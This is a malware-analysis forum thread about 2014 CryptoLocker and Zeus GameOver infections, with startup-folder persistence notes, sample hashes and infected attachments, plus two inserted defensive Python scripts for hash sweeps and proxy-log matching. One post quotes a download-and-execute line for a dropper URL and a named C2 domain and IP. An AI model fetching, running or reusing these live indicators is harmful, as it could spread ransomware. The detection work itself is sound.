A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #22339  by dairu87
 Sun Mar 02, 2014 9:49 pm
Coming across more and more CryptoLockers again... Doesn't look like the same old stuff though. Doesn't appear to be running out of the old location (%localappdata%) or creating the old registry keys to launch it on startup (HKLM/HKCU > Software > Microsoft > Windows > CurrentVersion > Run & RunOnce, or HKLM/HKCU > Software > Microsoft > Windows NT > CurrentVersion > Winlogon). The "CryptoPrevent" that was created to stop it from running out of the old directories does not appear to be stopping it either... Looking in Task Manager there are no bad processes listed. Tried looking through Sysinternals Process Explorer and still not seeing anything. Has anyone seen this new version or managed to get a sample? I have another 2 or 3 clients with it on their machines so I will still be working with it, and if I can manage to locate it and obtain a sample I will certainly share. :)
 #22340  by dairu87
 Sun Mar 02, 2014 10:51 pm
Found it :) Looks like it runs out of the Startup directory in the Start Menu for every single user, including All Users and the system profile. Still have a few more cases of it... If I notice anything else different I will post more samples.
https://www.virustotal.com/en/file/f09b ... /analysis/ - EPUHelp.exe SHA: f09b2a3c7128875b4568598d26c03f4494c067f100df6c3f5853ce6a04a82885
https://www.virustotal.com/en/file/e1fd ... /analysis/ - 483ac69.exe SHA: e1fd365bb308126ddcceb5df5b82104f54200b84d45e29f82858557b0b341aaa
Attachments: infected (324.12 KiB)
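The sweep described in the post above (every user's Startup folder plus All Users and the system profile, compared against the two SHA-256 values given) as an added example; this is not code from the original post. It assumes the Vista-and-later Startup folder layout under a volume root, takes that root as a parameter so it can be pointed at a mounted image, and builds a constructed test tree with stand-in bytes rather than embedding the real samples.

```python
"""Added example (not from the post): sweep every Start Menu Startup folder
on a Windows volume, hash what is there and flag the SHA-256 values quoted
above. The volume root is a parameter so it can be pointed at a mounted
image or, as below, at a constructed test tree."""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple

# SHA-256 values given in the post.
KNOWN_BAD: Dict[str, str] = {
    "f09b2a3c7128875b4568598d26c03f4494c067f100df6c3f5853ce6a04a82885": "EPUHelp.exe",
    "e1fd365bb308126ddcceb5df5b82104f54200b84d45e29f82858557b0b341aaa": "483ac69.exe",
}

# Startup folder layout on Vista and later, relative to the volume root.
USER_STARTUP = os.path.join("AppData", "Roaming", "Microsoft", "Windows",
                            "Start Menu", "Programs", "Startup")
ALL_USERS_STARTUP = os.path.join("ProgramData", "Microsoft", "Windows",
                                 "Start Menu", "Programs", "Startup")
SYSTEM_PROFILE = os.path.join("Windows", "System32", "config", "systemprofile")


def startup_folders(volume_root: str) -> List[str]:
    """Candidate Startup folders: All Users, the system profile, then one per
    directory under Users (listed whether or not the folder exists yet)."""
    folders = [os.path.join(volume_root, ALL_USERS_STARTUP),
               os.path.join(volume_root, SYSTEM_PROFILE, USER_STARTUP)]
    users_dir = os.path.join(volume_root, "Users")
    if os.path.isdir(users_dir):
        for name in sorted(os.listdir(users_dir)):
            folders.append(os.path.join(users_dir, name, USER_STARTUP))
    return folders


def sha256_of(path: str) -> str:
    """Streamed SHA-256 so large files are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(volume_root: str, known: Dict[str, str] = KNOWN_BAD) -> List[Tuple[str, str, str]]:
    """Return (path, sha256, label) for every file found in a Startup folder.
    label is the known-bad name on a hash match, else 'unknown'. Unknown
    entries are still returned: a fresh build will not match old hashes."""
    findings = []
    for folder in startup_folders(volume_root):
        if not os.path.isdir(folder):
            continue
        for name in sorted(os.listdir(folder)):
            path = os.path.join(folder, name)
            if not os.path.isfile(path) or name.lower() == "desktop.ini":
                continue
            digest = sha256_of(path)
            findings.append((path, digest, known.get(digest, "unknown")))
    return findings


# Constructed stand-in bytes; the real samples are not embedded here.
STAND_IN = b"MZ constructed stand-in for the Startup-folder dropper, not the real sample\n"


def build_sample_tree() -> Tuple[str, Dict[str, str]]:
    """Lay out a fake volume in a temp dir with a planted file in one user's
    Startup folder and one in the system profile's, plus benign noise.
    Returns the root and a hash list extended with the stand-in's digest."""
    root = tempfile.mkdtemp(prefix="winvol_")
    planted = {
        os.path.join(root, "Users", "alice", USER_STARTUP, "EPUHelp.exe"): STAND_IN,
        os.path.join(root, SYSTEM_PROFILE, USER_STARTUP, "483ac69.exe"): STAND_IN,
        os.path.join(root, ALL_USERS_STARTUP, "desktop.ini"): b"[.ShellClassInfo]\r\n",
        os.path.join(root, "Users", "bob", USER_STARTUP, "OneNote.lnk"): b"L\x00\x00\x00shortcut\n",
    }
    for path, data in planted.items():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)
    known = dict(KNOWN_BAD)
    known[hashlib.sha256(STAND_IN).hexdigest()] = "constructed stand-in"
    return root, known


if __name__ == "__main__":
    root, known = build_sample_tree()
    for path, digest, label in sweep(root, known):
        print(f"{label:22} {digest[:16]}...  {path}")
```

Point `sweep()` at the volume root of a live box or a mounted image (with the default `KNOWN_BAD` list) to get the hash of every file sitting in a Startup folder; the registry Run/RunOnce/Winlogon locations the first post already checked are out of scope for this sweep.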
 #22361  by forty-six
 Wed Mar 05, 2014 2:15 am
Fresh Cryptolocker. Different from above sample.
Code:
Zeus GMO

user_execute http:// bestchoicelipo .com /download/files/small0403.exe 


POST /home/ HTTP/1.1
Host: lcbohxwxhihpjwg.biz 
Content-Length: 192
Connection: Close

IP: 195.2.77.142

Attachments (588.75 KiB)
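Detection logic for the indicators in the post above (the dropper download URL, the C2 host and its IP), as an added example that is not part of the original post: it runs the IOCs over proxy log lines and lists the internal hosts that hit them. The log lines and the field order (timestamp, source IP, method, host, path, destination IP, bytes) are constructed for the example; the defanged download host from the post is re-joined so it can be matched; and the "small POST to /home/" rule is a weak heuristic added here, kept separate from the exact matches.

```python
"""Added example (not from the post): run the Zeus GameOver indicators quoted
above against web-proxy log lines and pull out the hosts that talked to them.
The log format and the log lines are constructed for the example; the field
order 'timestamp src_ip method host path dst_ip bytes' is an assumption."""
import re
from typing import Any, Dict, List, Optional

# Indicators from the post. The download host was defanged there
# ("bestchoicelipo .com"); it is re-joined here so it can be matched.
DROPPER_HOST = "bestchoicelipo.com"
DROPPER_PATH = "/download/files/small0403.exe"
C2_HOST = "lcbohxwxhihpjwg.biz"
C2_IP = "195.2.77.142"

# Tags that stand on their own as evidence; the heuristic tag does not.
HARD_TAGS = {"dropper_download", "c2_host", "c2_ip"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<method>[A-Z]+)\s+"
    r"(?P<host>\S+)\s+(?P<path>\S+)\s+(?P<dst>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<bytes>\d+)$"
)


def parse(line: str) -> Optional[Dict[str, Any]]:
    """One log line to a record, or None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec: Dict[str, Any] = m.groupdict()
    rec["host"] = rec["host"].lower()
    rec["bytes"] = int(rec["bytes"])
    return rec


def classify(rec: Dict[str, Any]) -> List[str]:
    """Tags for a record: exact IOC matches first, then a weak shape heuristic
    (assumption: a small POST to /home/ looks like the C2 beacon above)."""
    tags: List[str] = []
    if rec["host"] == DROPPER_HOST and rec["path"] == DROPPER_PATH:
        tags.append("dropper_download")
    if rec["host"] == C2_HOST:
        tags.append("c2_host")
    if rec["dst"] == C2_IP:
        tags.append("c2_ip")
    if not tags and rec["method"] == "POST" and rec["path"] == "/home/" and rec["bytes"] < 1024:
        tags.append("post_home_heuristic")
    return tags


def scan(log_text: str) -> List[Dict[str, Any]]:
    """Every tagged record, in log order; unparseable lines are skipped."""
    hits = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append({"ts": rec["ts"], "src": rec["src"], "host": rec["host"],
                         "path": rec["path"], "tags": tags})
    return hits


def infected_hosts(log_text: str) -> List[str]:
    """Internal addresses with at least one hard IOC hit; heuristic-only hits
    are left for a human to review rather than added to this list."""
    return sorted({h["src"] for h in scan(log_text) if HARD_TAGS & set(h["tags"])})


# Constructed log lines: a download of the dropper, two beacons to the C2
# from the post, one benign request and one look-alike POST elsewhere.
SAMPLE_LOG = """\
2014-03-04T21:03:11 10.0.0.23 GET bestchoicelipo.com /download/files/small0403.exe 198.51.100.7 344064
2014-03-04T21:03:19 10.0.0.23 POST lcbohxwxhihpjwg.biz /home/ 195.2.77.142 192
2014-03-04T21:04:02 10.0.0.41 GET www.example.com /index.html 93.184.216.34 1270
2014-03-04T21:05:45 10.0.0.23 POST lcbohxwxhihpjwg.biz /home/ 195.2.77.142 192
2014-03-04T21:07:10 10.0.0.58 POST qwertyuiop.biz /home/ 203.0.113.9 192
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["host"], ",".join(hit["tags"]))
    print("infected:", infected_hosts(SAMPLE_LOG))
```

The split between hard tags and the heuristic is deliberate: the host and IP from the post are enough to act on, while a small POST to /home/ on some other domain is only a reason to look closer, since the C2 domains rotate and the IP will not stay useful for long.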
 #22626  by Intimacygel
 Fri Apr 04, 2014 9:57 pm
Hi all,

I got one off a customer's box today but sadly they were infected on 3.27 and these samples no longer work. I'm a level 0 reverser, so my uneducated guess is that they query the server that would hold the key, see it's no longer operational and then just kill/delete themselves. The info I have is based off their AV's logging, which needless to say failed.

There are some files missing from this chain of dropping, but I was unable to grab them.

file-6791126_exe
initial Zeus Dropper

Drops
Ifyxplsjpjbpdjv

Which then drops
ls44

Useful to anyone?
Attachments: infected (605.75 KiB), infected (595.7 KiB), infected (8.55 KiB)